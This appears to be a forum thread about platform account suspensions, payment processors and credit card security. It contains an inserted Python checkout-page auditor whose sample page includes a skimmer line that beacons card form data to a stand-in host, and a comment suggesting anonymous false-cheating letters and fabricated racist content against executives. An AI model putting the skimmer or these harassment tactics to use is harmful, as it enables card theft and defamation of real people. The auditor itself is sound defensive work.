It's a constant fear, and there's no way to avoid using these companies. I'm currently dealing with a bakery business that was suddenly suspended from Google Maps. This is a big deal because it's the main way, by far, that people find us.
7 days ago, boom. Your account has been suspended for not following the business guidelines. The only thing I've updated recently was our hours. It's been listed without problems for about two years.
Of course they don't tell you what the issue is. They just tell you to fix it and then beg them to reinstate you. It takes up to two weeks apparently (7 days so far). And if they decide not to, the only thing you can do is delete the listing, and two years worth of hard earned reviews go up in smoke.
A few days ago one of our staff told me a Korean tourist came in the day before we were suspended and accused us of being fake. I don't know exactly what happened but due to the tourist's limited English nobody could persuade them we were the real location. Or maybe they were looking for somewhere else entirely? Who knows. Apparently they left a negative review, which I can't see while the account is suspended. Probably they reported the location as fake.
So that's it. Two years, over 100 positive reviews sitting at 4.9 stars. Gone because of one confused tourist. Or maybe because I updated the hours. Or maybe an automatic spam check didn't like us.
I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
My wife's floristry business has been blocked from being able to access Facebook advertising and permanently restricted in how she is able to interact with her customers, in part because a bot flagged and suspended her for trading in exotic animals. The exotic animal she was accused of trading? Aphelandra squarrosa - the zebra plant.
There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
> There's no way of getting this ban reversed, there's no way of invoking any human to perform a manual review on the ban. It is a permanent restriction that impacts her ability to communicate with her customer base.
You know you're doing it wrong when the Ministry of Information in the movie Brazil has better customer service than you do.
Getting lawyers involved is one guaranteed way to talk to a human at Facebook. It won't be easy or cheap though, so I can understand why a business like a flower shop wouldn't want to do that.
if you're based in Europe, try framing it as a GDPR issue. Article 16 says that data processors have to rectify data that is inaccurate or incomplete within 1 month. If they don't do that, you can raise it to your national privacy ombudsman as an incident. This being Facebook, there is a chance that they'll act on it.
Be sure to CC privacy@facebook.com and legal@facebook.com
Only issue: not sure that the GDPR applies to companies. And it's a 'pro' account I guess?
Sorry to hear this. Floristry is pretty cut-throat with all the shipped-direct sites that undercut prices. (Used to work at FTD.com, which bought ProFlowers, a very large flowers-in-a-box operation.)
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
This! Couldn't agree more. I believe this is a much bigger problem than privacy, which is preventable (users can choose not to use a service), but this can take down entire businesses because of data giants' crappy/false alerting systems.
It should be illegal for Google, say, to remove a listing without proof, or if that's not possible, if they remove it they should legally be forced to compensate for the damage done. (Of course Google is just an example here, this applies to any large enough platform.)
By that logic you can just not use Google. But that's ridiculous, as ridiculous as the statement that users can choose not to use a service. I believe it's impossible to live in modern society without having an account in FAANG, even harder than a business not having a google maps listing.
Given that Google handles a tremendous amount of email (not all to gmail.com domains either), and that other companies maintain "shadow profiles" of non-members, or simply track vast numbers of people (credit bureaux and other data-brokers), let alone the vast levels of surveillance baked into the present-day Internet, saying people can simply opt out of services is ... profoundly untrue.
There's no need to pit fairness in business dealings against privacy. Both are wins for the average person.
I really am in favor of your suggestion. Next to that, my stance is that big companies should by law be required to have a human representative you can contact, especially in the time of AI.
> I sincerely hope that the next round of EU laws tackles this instead of privacy. It's just as big an issue, especially if you're running a small business.
At least in Germany, you can file for a court order ("Einstweilige Verfügung") against Google - that usually works out and is relatively cheap, a couple hundred euros. Consult a lawyer, I think most EU countries have a similar instrument. Do note, you might have to file for an order both against the Google Europe HQ in Dublin/Ireland and against your country's Google office.
How would this work? Google isn't an official registry, do they have an obligation to list any business?
And the privacy argument is often effectively countered with security concerns, even more so if that is expressly stated so in the ToS.
Just to be clear: I'm 100% on the GP's side, I'm just curious what the Verfügung could do here. In order for the court issue such an order, it needs at least a reasonable legal basis.
Even if you don't want to be listed on Google Maps, they will sometimes generate a fake listing for you anyhow. I got burned by one of these as a customer: the link for takeout was not actually a site the restaurant was partnered with. I've also seen restaurants with similar names URL-squat these other places.
It seems so bizarre that Google will publish such information without ever validating it with the business. It must cause a lot of damage and support quite the environment of scammers, though.
This happened to a restaurant I go to a lot. Their Maps listing said there was online ordering, but the link went to a site that even had a disclaimer saying they were not actually affiliated with the restaurant. I reported it to Google and they removed the entry, but anyone can make a change and double checking seems to be cursory at best.
On the flip side, as an avid Google Maps reviewer they also removed my negative review from a restaurant without any good reason (supposedly the business reported it as being “fake” or something)
It really pissed me off because I wrote a long thoughtful review and mentioned the good aspects of the restaurant too as well as some recommendations, and it’s just completely gone
The worst part is the restaurant is sitting at 4.5 stars despite being quite bad, and the recent low star reviews are all questioning the rating, which is obviously artificial
I've been reading a lot of reports recently about how businesses abuse AirBnb and Google Maps reviews by forcing the companies to remove them on technicalities or by outright lies. I wonder if I should just post any less-than-stellar reviews without any text but with rating only in order to make it harder for them to remove. Thoughts?
This is also a problem on the customer side. I don’t shy away from leaving bad reviews to businesses that deserve it. These businesses either reply with a passive aggressive doxx like “Hi Or Nornor” when I don’t use my real name anywhere on the internets (including medical-related businesses), or they report the review and my account gets blocked with all my reviews removed.
And then of course there isn't a single living human at Google you can contact to even find out which review was flagged, why, and what to do about it.
I don’t even read reviews anywhere anymore, they’re all faked or AstroTurfed anyway that they give no indication of anything. What a brave new world.
I encountered the same problem recently. My family member’s business changed location. Updating the Google maps listing caused Google to flag it for not following guidelines and weeks passed with the listing being “under review”.
The solution that ended up working for me was to start paying a few dollars a day for AdWords. For some reason that cleared the issue up the next day. Then I turned AdWords down to a few bucks a week and later off entirely.
> The solution that ended up working for me was to start paying a few dollars a day for AdWords. For some reason that cleared the issue up the next day.
Yes, for some reason it cleared up after spending money. I really hope it’s not the norm. Sounds like extortion to me.
Can confirm. This works in more places than one, Reddit too. Reason? When you're a paying customer, you get routed to elevated support staff. They have a higher incentive to help you fix the problem and fast.
I don't hate it, I appreciate it. Better than having no easy recourse. Because I bet if everyone were treated equally, it'd be shitty service for all. Better to toss in a few bucks if it's valuable and get the support (and some ads run).
This sounds like a Mafia movie. Pay up for a little protection and don't let it happen again!
Intentionally or accidentally, it's a great problem for big tech to have. You scramble with everybody else to be on the service and the DDOS crowd, confused tourists and local ruffians take your account offline. Better grovel up to reinstate your honour and pay for protection/added services/more identity validation that doesn't stop the problem from happening. Same thing every big country does, we are all under a "security umbrella".
Honestly, real-life advertising needs to make a comeback. And localized knowledge of the businesses worth keeping alive, for when Google's security algorithm dumps them without administration even knowing it. Eggs all in one basket was never a good idea, right?
Also, how should a small business deal with fake negative reviews in, say, the Play Store? Google does nothing to fix that. As the app developer you know a review from an account that didn't sign up to your service is fake, especially when it appears at the same time as other similar fake reviews do.
If you happen to review a few places on Google Maps you are holding superpowers. I don't know if that works for new accounts too. But yeah, at least if you have some activity and then report a place as closed, they are "checking" it for 1h, then you get the e-mail that the place got removed from Maps.
I use that for good purpose - I fix a lot of invalid information on Google Maps around my home town, and they apply the changes without batting an eye. This is good for society. But I can clearly see how that could be used for abusive purposes.
I feel like you should be able to request a call from their call center rather than be forced to wait on the phone for one. The long wait times to speak to representatives are a cost-saving measure.
First saving on having to hire an appropriate level of customer service staff. Second that percentage of people who give up.
It's a feature, not a bug.
I think one of the Pixel phones had an option to detect when there was a human on the other end of the line. Definitely made me consider getting it back when I was looking for a new phone.
Well because there's already been a lot of laws passed in that regard and there's already momentum. I don't mean they should stop this momentum, these privacy laws are incredibly important.
Because privacy laws have zero teeth and workarounds are technically easy (or endlessly annoying for zero new outcome, e.g. see cookie popups). If the EU would actually enforce GDPR it would be amazing.
Meanwhile these companies who have essentially became a public utility don’t provide customer support or explanations.
You get bad service from these companies for the same reason the government generally provides bad service: they are monopolies with no reason to spend more money to improve.
I worry about the horrible side effects that would occur from trying to grant that wish. It is always easy to make demands when you aren't the one carrying them out and most people don't think the implications through.
My mind just boggles at the implicit additional bureaucracy, expenses, and slowdowns being cheered for. The kind of mess which results in a system so complex that it has its own "degrees which shouldn't exist" spawned from it like medical billing.
You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
I’ve recently seen more use of Apple Pay via websites. Assuming it works as Apple Pay usually does, this at least is technically more secure (though I don’t like giving Apple more power) since it’s basically an exchange of cryptographically secure/verifiable one time tokens.
PayPal is no one’s favorite but at least if you use that you’re not handing over your CC number. (And yet they seem to lock out tons of merchants, hmm)
Why are we still using credit cards? It’s not great as a consumer either - I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
> Every time I do a CC transaction I’m giving a stranger exactly the information they need to do an entirely different, arbitrarily large CC transaction in my name with any merchant. That’s bonkers.
You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant. What you are doing is providing your card information to a PSP (payment service provider) that has been contracted by the merchant and will provide the merchant with a token with which the merchant can trigger a charge request to your card but only to their own pre-approved acquirer account. The merchant can do nothing else with these tokens.
A breach of the merchant's token database would be embarrassing but harmless. A breach of the PSP's database of card numbers would be bad and inconvenient for the cardholders, sure, but it would be a business-terminating event for the PSP as its PCI DSS [0] compliance would be shattered and it would be unable to operate again.
In summary, ordinary card payments are essentially as secure as Apple Pay. The only difference is that in one case you are trusting a gigatech brand which is very saliently involved in the process but whose side-business in payments has only operated since 2014, while in the other case you are trusting businesses that you may or may not have ever heard of —Adyen? Braintree? WePay? Worldline?— but that have probably been dealing with secure payment processing as their primary or only business for much longer.
I think you missed the “over the internet” part. When you do a CC transaction over the internet, you give the merchant your CC number and all the other information needed to make a transaction happen. A legitimate merchant may pass that information directly to a PSP, but you can’t deny you’ve given the merchant the information. Surely you’ve filled out a CC form in a website before?
What prevents me from cloning some product's website and changing the payment form to send me the details instead, which I then submit somewhere else to purchase something online for myself? Not sure why Stripe or PCI is even important here.
(IMO) what GP was arguing for is that we should have a fundamentally asymmetrical form of payment, viz. the information I give for one purchase should not be able to be reused for another purchase, like a one-time token. Imagine if you had to send your private key every time you wanted to purchase something in crypto, for example.
This is correct and the GP is (confidently) talking nonsense.
However the big issue is most normal users would not have the ability to see if they're using an embedded iframe or cross origin JS from Stripe, Braintree, etc.
> You may be surprised to know that, when doing a "conventional" CC transaction, you are most certainly not giving any stranger information that would allow them to perform a transaction in your name on another merchant.
No. In the best case, you're giving your payment details to a PSP. A couple of years ago NewEgg had a JavaScript skimmer on their checkout page that harvested all their customers' payment details for months. Obviously anyone with access and intent could do the same for any payment page.
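As an added example (not code from the thread, from NewEgg, or from any PSP), here is the kind of check a security engineer would run against a checkout page to catch the skimmer pattern the comment describes: a script that loads from, or exfiltrates to, a host the shop never approved. The shop origin (https://shop.example), the PSP origins (js.psp.example, checkout.psp.example), the allowlists and the sample page are all constructed; the last inline script in the sample is the planted skimmer. The same allowlists are turned into the Content-Security-Policy that would have blocked both the load and the beacon.

```python
"""Audit a checkout page for card-skimmer indicators and derive a CSP."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_ORIGIN = "https://shop.example"                                   # assumed
ALLOWED_SCRIPT_ORIGINS = {PAGE_ORIGIN, "https://js.psp.example"}       # assumed
ALLOWED_FORM_ACTIONS = {PAGE_ORIGIN, "https://checkout.psp.example"}   # assumed

# Absolute http(s) URLs embedded in inline script text (host part only).
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?")


def origin_of(url, page_origin=PAGE_ORIGIN):
    """scheme://host for a URL as the browser would resolve it on this page."""
    p = urlparse(url.strip())
    if p.netloc:                       # absolute or protocol-relative (//host/x)
        return f"{p.scheme or 'https'}://{p.netloc}"
    if p.scheme:                       # data:, javascript:, blob: never match an origin
        return p.scheme + ":"
    return page_origin                 # relative path


class CheckoutAuditor(HTMLParser):
    def __init__(self, page_origin):
        super().__init__()
        self.page_origin = page_origin
        self.findings = []
        self._inline = None            # text buffer while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src is None:            # inline script: must carry a CSP nonce
                self._inline = []
                if "nonce" not in a:
                    self.findings.append(("inline_script_without_nonce", ""))
                return
            origin = origin_of(src, self.page_origin)
            if origin not in ALLOWED_SCRIPT_ORIGINS:
                self.findings.append(("unexpected_script_src", src))
            elif origin != self.page_origin and "integrity" not in a:
                self.findings.append(("third_party_script_without_sri", src))
        elif tag == "form":
            action = a.get("action") or ""
            if origin_of(action, self.page_origin) not in ALLOWED_FORM_ACTIONS:
                self.findings.append(("unexpected_form_action", action))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline)
            self._inline = None
            known = ALLOWED_SCRIPT_ORIGINS | ALLOWED_FORM_ACTIONS
            for url in sorted(set(URL_RE.findall(body))):
                if origin_of(url, self.page_origin) not in known:
                    self.findings.append(("inline_script_contacts_unknown_host", url))


def audit_checkout(html, page_origin=PAGE_ORIGIN):
    """Return a list of (finding, detail) tuples for one checkout page."""
    auditor = CheckoutAuditor(page_origin)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def build_csp():
    """Policy that blocks the skimmer's two moves: loading and exfiltrating."""
    scripts = " ".join(sorted(ALLOWED_SCRIPT_ORIGINS))
    forms = " ".join(sorted(ALLOWED_FORM_ACTIONS))
    return (f"default-src 'self'; script-src {scripts}; "
            f"connect-src {scripts}; form-action {forms}")


# Constructed checkout page; the final <script> is the planted skimmer.
SAMPLE_PAGE = """
<form id="pay" action="https://checkout.psp.example/charge" method="post">
  <input name="pan"><input name="exp"><input name="cvv">
</form>
<script src="/static/checkout.js"></script>
<script src="https://js.psp.example/v3/fields.js" integrity="sha384-abc"></script>
<script src="https://cdn.stats-example.net/t.js"></script>
<script>
  document.getElementById('pay').addEventListener('submit', function () {
    navigator.sendBeacon('https://collect.example.org/x',
                         new FormData(document.getElementById('pay')));
  });
</script>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout(SAMPLE_PAGE):
        print(f"{kind:38s} {detail}")
    print(build_csp())
```

Against the sample page this reports the unknown script host, the inline script with no nonce, and the beacon to collect.example.org; the generated policy has no 'unsafe-inline', so the legitimate inline handler would need a per-response nonce, and connect-src covers sendBeacon and fetch alike. The check is only as good as the allowlists, and a compromised host that is on the list (a third-party tag manager, say) is exactly why the SRI finding exists.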
> I have had my card locked for traveling within the same city and spending maybe $20 at a merchant I don’t usually visit. I had it locked because of a $5 web service monthly charge - and I had verified the same charge the two prior months.
This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype, and the billing is regular as clockwork. For at least half of that time, I've complained about it vocally and customer service can't do anything. Now I think about this every single time I hear "AI-assisted fraud detection", and by extension "AI-assisted security" and really "AI-assisted XYZ". Without another credit card, I guess I'd simply live in constant fear of being embarrassingly declined totally at random on any/every transaction. It's not like I know the billing cadence, even though my bank has a decade of history.
Clearly they are simply selling my history to the highest bidder, because they certainly aren't using it to help me. On a related note, ever notice that vanilla "exact substring match" search even in Gmail is just as bad as Google web search? All these corporations that are allegedly indexing us to "value-add" with some perfect high-resolution consumer model can't even do basic shit despite all the spying. I almost expect my privacy to be fucked, like I guess hey, that's modernity. What never ceases to surprise me lately is how the pretense has kind of dropped and we get nothing in exchange, even petty conveniences.
> This happens to me almost every time Skype bills me, and I've been a customer for probably 10+ years with both my bank and Skype
Why are you still with that bank? Even if you like everything else about them, couldn't you just open an account with another bank for Skype billing? Having more than one account is helpful anyway for avoiding having a single point of failure where you can't buy anything.
Unfortunately we didn't use the contactless change to finally fix this. NFC payments are still stuck in the world where the client doesn't have a way to make the payment themselves so has to trust the payment terminal the merchant puts in front of him with their secret information. The transaction should have been reversed. The merchant should have the dumb side, where they only communicate payment details, and the client's phone should be the one doing verifications and initiating the payment. It's bonkers that this hasn't become standard yet. Even more bonkers that internet payments didn't make the same switch long ago.
At least in this respect the now prevalent UPI (Unified Payments Interface) used throughout India fares better.
Each merchant -- even a roadside vendor or a mobile hawker of wares -- displays a QR code that has their payment account details / UPI handle.
The customer uses their own phone and UPI payment app to scan that QR code, look at the merchant details displayed, punch in the amount to pay and authorize the payment using their PIN.
(A variation on this is: hand-held POS terminals display a QR code that also encodes the amount to be paid, so that the customer doesn't have to punch in the exact amount.)
And since this is a unified protocol the users are not stuck with a single payment app or a single payments processor or a single bank network to transact with each other. QR codes are universal - they can be scanned by any UPI app.
I have other reservations about the digital trail this leaves for every petty transaction of your life -- and the small risk of a petty vendor being able to harass you later based on the information you leave in their records.
If we don't trust the government -- this makes us jittery about how much they can track you or even cripple your life by disabling a few key things that you need for this all to work smoothly.
Those risks aside, this UPI system has been a boon to ease of transactions (without worrying about handling cash and change) across the country. Net positive with some scope for improving privacy protections.
That would have been nice, but not backwards compatible with millions of POS terminals and payment processing setups out there.
One big advantage of contactless card payments as implemented in most countries is that you can seamlessly introduce it, making it look like a regular chip or even magnetic stripe transaction to the POS and everything behind it.
EMV is in a substantially better position than online credit card payments: the terminal cannot clone a card (though it sees a PIN and card number, it does not see the CVV, so it is not useful for online transactions, and the card contains private keys which are relatively hard to extract. The only remaining hole is creating a magstripe card, but these are becoming rare even in the US). The card does see and verify the transaction. The two main issues are the PIN entry onto the pad (which exposes some information, though with NFC this hole is somewhat removed), and the fact that the payment is still initiated by the terminal, with no way for the user to independently see the transaction amount before authorising the transaction (NFC on a phone can in principle fix this, though in a somewhat annoying manner: it could refuse the transaction the first time, then prompt the user, and accept the next transaction for the same amount).
This is how it works in a lot of places, including everywhere in China and parts of south east Asia. The merchant’s device displays a QR code, which you scan with your phone. The details of the transaction are shown on your screen, and you can select things like where the money should come from, sometimes discounts etc, and then tap to complete the transaction.
> You can blame the evil competitor but the real problem is that credit cards are not the right tool for payments to strangers over the internet.
Granted the entire system needs a revamp, but credit cards are one of the best tools we have to pay strangers right now. Credit card money isn’t your money being spent, and comes with a fraud guarantee. I would rather use a credit card than something linked to my money in a checking account for sketchy transactions.
Yes, it’s a hassle when the card number inevitably gets stolen, but NFC payments, etc are starting to tackle this.
One thing I’ve seen a lot is people misunderstanding credit cards. If you pay them off monthly, you usually get some kind of reward and additionally a huge layer of fraud protection from your personal finances. That being said, I also can’t wait until more secure credit card systems become more prevalent.
In much of the world, the "credit card" payment goes through a pre-paid card. Then you're actually putting your own money on the line, and even if there's a guarantee, it's a pain to actually go through the process of invoking it.
If this is one of the best tools, then I'm really dismayed at the state of payments around the world. SEPA bank transfers are so much better, even if they have other problems.
My cc number is useless without access to my bank account. The hacker would also need to steal my phone and bypass the fingerprint scanner somehow to get in there.
>One thing I’ve seen a lot is people misunderstanding credit cards.
Practically all the credit card haters turn out to not understand credit cards, it's almost hilarious. Are people not taught even the very basic of financial know-how from anyone?
> Why are we still using credit cards? It’s not great as a consumer either
Because the big networks (Mastercard and Visa) as well as the issuer and acquirer banks spend insane amounts of money on advertising and lobbying - even in the EU where payment fees are capped, the cap on CC fees is notably higher than on debit card/SEPA fees, so there is a clear incentive for everyone in the chain to push for credit cards.
Additionally, issuer banks make a ton of money on interest which means they have even more of an incentive to push for CC usage.
And also this reliance on a few payment providers causes the same type of problems as this business has with Google - big businesses trampling yours on a whim, with no real recourse. The problem is actually far worse with payment processors, who are increasingly taking it upon themselves to be an unelected worldwide morality police, deciding which types of commerce shall be legal with their own de facto law.
Is it? My bank accounts in two European countries have in the last year transitioned from Visa credit cards to Visa debit cards, because the banks in both cases wanted about 2.5 euro per month for something that does not provide any value to me. Unfortunately Visa Secure seems to be changing its validation mechanism every 3 months though, which each time is super annoying.
This is not mandatory by law though, and mostly it's up to the merchant to decide whether they require 2FA or not. AFAIK payment processors like Stripe actually let you make 3DS (and whatever it's called for MasterCard / AMEX) mandatory.
I guess problem is that in US you'll lose a lot of customers by declining payments without 2FA. Also likes of AMEX use 2FA via email so I guess there could be fraud too.
We’re still using credit cards because they severely limit personal liability. Many CC companies give you the ability to have temporary cards with short-term expiration linked to your account. However, there are minimal incentives for you to do so.
The credit card company and indirectly the vendors carry much of the cost of fraud. The credit card company spends a lot of resources on preventing this fraud. Introducing a proper solution for online payments would allow them to reduce costs and offer better deals to vendors and consumers. They are also the only participant in this who is an individual participant rather than a group. It seems like this is the ideal setup for credit card companies to introduce innovative solutions. They have the incentive and the leverage, yet it's not happening. What am I missing?
Strong authentication/payment confirmation and strong consumer liability protection are not mutually exclusive.
In the EU, card issuers and merchants are required to use 3DS for e-commerce payments and PIN verification for in-person payments in many circumstances; yet chargebacks are still possible.
We use CC because the infrastructure is there and there is legally mandated (depending on jurisdiction) fraud protection.
When you pay with CC, the issuer is potentially on the hook for fraudulent payments, so they are incentivized to provide the protections.
And of course there are many that use CCs for the purpose of a loan to purchase items they can’t currently afford.
Although you're right that Apple Pay is cryptographically verified, you may be surprised to know these two things:
1. you can charge any amount - the amount shown in the Apple Pay UI is arbitrary
2. you can make multiple charges, also of any amount (e.g. for a subscription)
It is tokenized, but practically it's just a card number you can charge like any other card number. It's also typically linked back to the original PAN, so multiple payments can be correlated together with ease
Your payment processor and the network has to trust you if you're reusing the Apple Pay cryptogram for a subscription payment. You _can_ do anything (e.g. you can represent yourself as an open loop transit network reader and get a card number without any authentication from express mode cards!), but the network will not allow you to succeed doing that for very long, if at all.
A multi-cryptocurrency payment system would be the perfect solution for online payments but unfortunately nobody has figured out how to solve the double-bullet problem which stands in the way of mass adoption.
No, it's really not. As a buyer I don't want irreversible transactions to someone anywhere in the world, I want something that if the seller isn't acting fairly (items not as described, not shipping orders, etc.) I can lean on to get my money back.
I hate 3D Secure, it's a way for banks to move the liability and inconvenience to me, their customer. In most implementations, I need to wait for an SMS, and often that SMS takes ages to come.
Then there's a bit of a monopoly with 3d secure implementation by cardinal.js and their solution falls down completely if you have a decent amount of traffic on the site (I have worked on flash sales websites, cardinal js is about as reliable as I can throw my car)
No information given about the actual activities ongoing here so I’ll focus on the service providers behaviour directly.
Given the meteoric rise of companies charging for services with no support of any type available for consumers other than hoping for traction on social media, how do we legislate to basically enforce some alternative to ‘computer says no, just make a new account and hope it doesn't happen again’? This seems like something consumer protection agencies should be all over.
Australia’s consumer protection body is actually quite active in enforcing our rights when dealing with these sorts of things. Does America not have a similar agency or has it been captured by the companies it’s supposed to regulate?
These companies are collecting sizeable profits and part of the way they’re achieving this is by simply disregarding all the support and engagement processes ‘normal’ businesses have to have claiming their scale makes them impossible. That should just not be an acceptable answer as far as consumer remedies are concerned.
Payment processors are a natural monopoly and as such they should be regulated like utilities, i.e. not allowed to deny service without good reason. Unfortunately the government rather likes having a way to destroy the livelihoods of undesirables without any of that pesky due process.
The payment networks (Visa/MC/etc.) may be monopolies, but there are a ton of processors (Stripe/PayPal/etc.). Sure, all the smaller processors "suck", but somehow they worked before Stripe was founded.
We need some new snappy word to describe what service providers are doing.
I know you could probably say that its just some other existing legal construct which we should just enforce, but the point is that the media needs some snappy new very specific word to talk about to make politicians pay attention.
Things like swatting, phishing, slamming, gaslighting and boofing we all know about and are easy to write articles on with decent enough SEO.
So what is the snappy new 21st century term for this, so that we can complain about it and write blogs and articles about it and demand politicians do something about it?
Every business wishes it could be a vending machine. Strip out all employees and customer service and damn the consequences if your soda gets stuck.
Too many people and businesses have been relying on these vending machines, partially because they have no other choice. Everything has been hollowed out, every store runs on a skeleton crew. You know this if you’ve walked around a store wondering if anyone even works there. I never noticed this until I traveled to other countries and found businesses that actually felt like they wanted to please me instead of feeling like I was expected to be grateful that BigBoxStore (tm) exists.
"Deaf corporations" since they cannot hear, "Divine corporations" since they won't listen to you, "Nosumers" as the opposite of prosumers and a nice play with no-sum (you heard it first here)
It does, but it's still newish, and faces a lot of opposition from both politicians and businesses.
In 20 or 30 years, once the various lawsuits and codes get sorted out, it might work. But it's still in its toddler phase, and everyone is seeing if they can push the baby over.
The Federal Trade Commission seems relevant. I've not tested them on these "no support; no recourse" situations, but have had good results for other issues.
Anybody thinking of the "Better Business Bureau" should note that the BBB is not a government organisation and behaves more like a Better Extortion Bureau: paying members can keep their good rating by unilaterally declaring a claim has been resolved (often requiring claims to be reasserted multiple times), while non-members or non-paying members cannot even contest claims via the bureau.
We also have an issue of enforcement, I'm not sure if you know... but many, if not all of these behaviors could be acted on with existing legislation. Anti-trust at the federal level and a multitude of state laws on paper make it illegal to do this type of behavior.
The problem is that it's really hard to take action on large corporations. As a consumer, if I wanted to seek remedy for say, false advertising of ingress protection on a phone, it would cost hundreds of thousands of dollars in legal fees. Without a significant war chest it's almost impossible to hold most companies to account as an individual, and the agencies supposed to be enforcing these issues either won't or can't enforce the laws on the books.
The Aussie government has the same new account cycling that corporate culture does. It's just that the gov has call centres and support staff.
Do you think there's any incentive to fix these problems when the constant inconvenience and technical gremlins can be more easily and excitingly solved with biometric IDs and whatever else?
Let's be honest, the Australian government may clamp down on corporations, but it plays the same game and doesn't care for anyone's dissent in the long run.
Not sure if anyone has experimented with this but I wonder if there is a solution but it's just relatively unused. I've heard suing the company (or in most cases, taking them to arbitration) works and oftentimes the company is the one paying for the fees (because that's how arbitration works).
The claim that scale makes support impossible is ridiculous. Just make support a paid service and it'll easily pay for itself and scale proportionally. The will is simply not there
If you are being unethical there are a bunch of things you can do.
I would advise targeting people directly, anonymous letters directed to a spouse with accusations of cheating will help prevent executives from travelling and add a lot of personal stress on their lives, all it costs is a stamp. -- this is especially easy if you live in Sweden; since addresses and living arrangements are public info.
Other things you can do is to fabricate something racist and pay for a few hundred bot accounts to follow any mention of the company or product.
I have had both of these happen to me, and my industry is not very competitive nor am I a famous figure.
I hope this attack becomes more popular. I truly do.
Maybe these attacks will finally force regulators to do something about the financial parasites we call "payment processors". Any payment processing system that doesn't act like a public utility is broken and needs fixing.
I think the only digital payment system that comes close to acting like a utility right now is cryptocurrency which is a sad, sad state of affairs.
OP: While not a complete solution, you might be able to partially mitigate this by allowing customers to pay you in other forms (e.g aforementioned cryptocurrency, bank transfers). That's what the porn industry and other legal businesses end up doing when they inevitably find themselves in your position.
If your customers want your product badly enough, a small fraction of them will learn how to use these payment methods. You'll have to learn to survive on those alone.
Pix, the Brazilian payment system, is basically a utility, and payers authorize the payment rather than the payee. It has very little friction, everyone uses it. It does require working internet.
I feel that Algorand (I'm not a holder anymore) was positioned to work as such but would require all the parts to make it successful. The 0.001 ALGO transaction fee cuts down on silly transactions while making 0.1 ALGO transactions possible. It also allows trading in stablecoins or CBDCs as they are enabled. It can complete transactions in milliseconds and moderately-sized participants can easily help maintain the whole network. It never gained traction, however, probably because it isn't a good HODL.
Why is it sad? I truly don’t get it, people on HN will say they are somewhat libertarian, pro decentralization, anti corporate oligopolies, but then use their dying breath to say “crypto has no use case”. Yet while AI took nearly 70 years to find its footing, in just 10 years crypto (currencies) has already found inroads into many areas as a nascent technology that has massive potential to solve some of our biggest problems.
I truly think it’s one of those cases where the “wrong/dumb” people jumped onto it (alongside scammers) and so it became poisoned to the right/smart ones. But we should be way better than that! Is it really so hard for people to separate good from bad?
It absolutely bowls me over to see this lack of ability to discuss it carefully around here so consistently. So many potential amazing conversations totally shunted by the absolute need to turn it tribal.
> Is it really so hard for people to separate good from bad?
If you mean "HN people", then probably no; but if you mean more generalized "people", then definitely yes. Unfortunately, your customers are much more likely from the latter group.
Also, being in a sad state doesn't really mean it "has no use case", right?
As someone who worked in France for a medium-ish size media agency, we had something similar happening to our google adwords account... and it took ~2 weeks for our legal studio to get it back with direct support from google.
Afaik it mostly took them to basically write a few legal letters and telling them "our legal representatives would be glad to meet you at your offices at Google France and discuss such unfortunate issue and so and so" - they basically went "how about no" and restored the account.
Lawyer fees weren't particularly cheap (in the range of 2500-5000€) but still well below the money we were losing.
Is this not an option for US-based businesses? I have heard similar horror stories like the one on the OP a few times already but I've rarely seen them pursue a similar path.
It is absolutely an option. Some people simply choose not to pursue it for many reasons ranging from financial, to a matter of principle, effort required, or any other number of reasons.
> 10 year relationship with Paypal and 7 year relationship with stripe
Not that the author is implying this, but don’t ever make the mistake of thinking that these numbers ever matter. It’s not 1973 and you don’t shake hands with your banker.
The only number that matters is the number of dollars going through Stripe or PayPal because of your business.
Been there. It might be competitors. It might just be fraudsters looking to see what they can get for free from that otherwise useless stash of credit card numbers they stole or got on some forum from someone who did. Once your marketing hits the radar of one of these crews they will pass your service on to each other. As a merchant you need to develop your own fraud screening techniques or pay someone to do it.
(Pardon me if I am projecting from my past startup experience to yours in all my comments.)
I am not blaming the victim. But the industry is set up so the merchant is most responsible for detecting and dealing with fraud. And that is probably objectively not a bad call. You have all kinds of ways to detect who is doing this and ways to stop this. I hate this crime with a passion and cut it down from 5000/mo to 50/month at my first startup when it blew up on us. But it is true the credit card middlemen, having externalized the risk to you, don’t then innovate incremental tools for merchants that well. I was frustrated that when I received fraudulent requests there was no third party I could report my suspicions of fraud to with a confidence rating (or check against other merchants' suspicions). I did many years later see a service like that but now can’t find it.
Good luck. These guys are persistent. In my case most of them were coming from poor countries where a dollar of fraud is worth a lot more of their time than yours. Until you stop them cold, they will keep coming.
No OP, but I had it happen to me and adding a "3DS" card verification to the checkout flow made the problem go away. The 3DS step is where they text the customer a number they have to type in to proceed.
It's a pain for the customer so I only do it on newish accounts, repeat customers don't get bothered.
This was LONG ago so some context is less relevant now and may not apply to others, but three of a dozen of our tactics turned the tide, the last being the best, but building on the others:
